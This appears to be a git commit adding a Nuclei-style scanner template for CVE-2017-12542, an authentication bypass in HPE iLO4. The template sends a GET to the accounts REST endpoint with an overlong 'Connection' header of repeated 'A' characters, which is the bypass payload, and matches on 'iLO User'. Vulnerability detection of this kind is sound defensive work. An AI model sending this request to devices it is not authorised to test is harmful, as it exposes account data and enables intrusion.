Create CVE-2017-12542.yaml

patch-1
PikPikcU 2021-03-23 11:26:08 +00:00 committed by GitHub
parent 3252d3c5d3
commit 4244af34d2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions

View File

@ -0,0 +1,27 @@
id: CVE-2017-12542
info:
name: ILO4 A authentication bypass RCE
author: pikpikcu
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-12542
tags: cve, cve2017,ilo4
requests:
- method: GET
path:
- "{{BaseURL}}/rest/v1/AccountService/Accounts"
headers:
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
matchers-condition: and
matchers:
- type: word
words:
- "iLO User"
condition: and
- type: status
status:
- 200